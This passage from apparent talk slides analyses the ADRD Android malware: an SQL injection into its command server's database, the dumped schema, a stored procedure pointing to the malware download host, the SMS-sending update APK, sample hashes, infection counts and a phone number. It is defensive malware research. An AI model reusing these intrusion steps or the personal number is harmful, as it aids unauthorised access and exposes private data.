    * Other possibilities:
      + 1: Create a temporal DB with just one table each time, dump paginated rows and run backups. Problem: complex to do and complex to rebuild the original DB (also the language didn't help).
      + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES in the HTTP logs, and it's not usual to log all the DB queries for performance reasons).
  • 26. Database information
    - The whole schema obtained: list of tables, fields, types, stored procedures
    - IMEI/IMSI list (at least some of them), logs, keywords, Baidu accounts
    - The main stored procedure affected by the SQL injection retrieves the URL of myupdate.apk, which points to adrd.xiaxiab.com/down.aspx!
      * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
      * Stored procedure:
          --if (@netwap=2) select 'T-1|T11'
          --select 'T3http://adrd.xiaxiab.com/down.aspx'
          --select 'T213607170863|12345|+ -10086+ abc -597| [ '
          --else
          --select 'T013607170863'
      * Looks like they were considering the netwap (based on the mobile operator) as a criterion for sending commands
      * TX (where X seems to be a command type)
      * 13607170863 is a phone number located in Wuhan
  • 27. Database schema (table: columns; table names that did not survive extraction are left as "t_"):
    t_baiduHourPercent: autoid, mHour, mPercent
    t_ : myear, mmonth, mday, mhour, total
    t_baidukeyword: keyword, viewcount
    t_ : way, flag
    t_baidukeywordflash: keyword
    t_baiduOrtherKey: keyword, viewcount
    t_ : keyword, flag
    t_baidupwd: id, way, username, pwd
    t_ _wap: keyword, flag
    t_baiduwayname: way, wayname
    t_ _wap_back : keyword, flag
    t_keywordResult: id, keyword, link, head, flag
    t_androidtemplog: id, imsi, way, result, createtime
    t_ _wap_back : keyword, flag
    t_keywordResult20100601: id, keyword, link, head, flag
    t_ : flag
    t_keywordResult20101108: id, keyword, link, head, flag
    t_ : keyword, createtime
    t_baiduHourPercent20101012: autoid, mHour, mPercent
    t_androidtemplog_backup: id, imsi, way, result, createtime
    t_ _wap: keyword, createtime
    t_androidtemperrlog: id, compresslog, decompresslog, createtime
    t_ : keyword, createtime
    t_androidtemplog_backup201101: id, imsi, way, result, createtime
    t_ _wap: keyword, createtime
    t_android : id, imei, imsi, logs, ip, createtime, netway
    t_android : , , , , createtime
    t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
    t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick
    t_ _wap_20100323: keyword, createtime
    t_ _wap_20100722 : keyword, createtime
  • 28. Myupdate.apk
    - It uses the main package of the ADRD family, xxx.yyy.
    - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS...
    - Looks like a Google Reader
    - It adds a local SQLite DB (keyword storage):
        go_g1_sms: id, keyword, type, flag
        go_g2_sms: id, keyword, keyword2
    - SMSObserver:
      * Replaces keywords in SMSs.
      * Sends SMS!
  • 29. Samples (package name, MD5, ADRD version, IVer):
    com.beautyfullivewallpaper              4556a687a2845bf4dfac62c594938cf3  adrd.zt.cw.1    6
    com.yodesoft.yohandcar                  6783cee889fa64df68af58a56ff6e362  adrd.zt.2       6
    com.binaryloft.live.winter              aa5216da617839e818d83d8185da42b0  adrd.zt.jtj.2   6
    com.magicwach.rdefense                  839c37f3a2c8d31561d28f619a2a712e  adrd.zt.cw.3    6
    com.tat.livewallpaper.dandelion         5192ad05597e7a148f642be43f6441f6  adrd.zt.cw.4    6
    com.classicnerds.livewallpaper.HK       b72724d8fc0f633194dcc3bd28eec026  adrd.zt.cw.5    7
    fishnoodle.night_city                   a01ba26a34e55f71873782348ff5e074  adrd.zt.dxm.6   7
    com.appspot.swisscodemonkeys.steam      cdfca19bf212adf3292e4fe677fe46a6  adrd.zt.cw.7    7
    kr.mobilesoft.yxplayer                  e3cc6c7af0d83fe322116254c01cf720  adrd.zt.cw.8    7
    com.labgency.wallpapers.waves           7d764347a0b0c9d11160d7a7684bf02b  adrd.zt.dxm.8   7
    com.laucass.andromax                    627f41c8f8e7ab007641c4a0c1d8ce1b  adrd.zt.cw.9    7
    com.digitalchocolate.androidrollergapp  71c0a67daa544450d7c620a48cc059b0  drd.zt.cw.12    7
    proscio.wallpaper.shamroc               e09782d35d72a769dc7454adb6d8e2e9  adrd.zt.cw.15   7
    com.tt.yy                               f2596f8f3c52381318f62d1ab161c284  ??              ??
  • 30. Infections: geolocation
  • 31. Infections by operator: +20K different IMSIs. Other affected operators: Far EasTone, Peoples Telephone Company, Hutchison 3G, PCCW Mobile, Sunday, Hong Kong Telecom, Smart One Mobile
  • 32. Thank you! Questions? @jaimeblascob @PabloForThePPL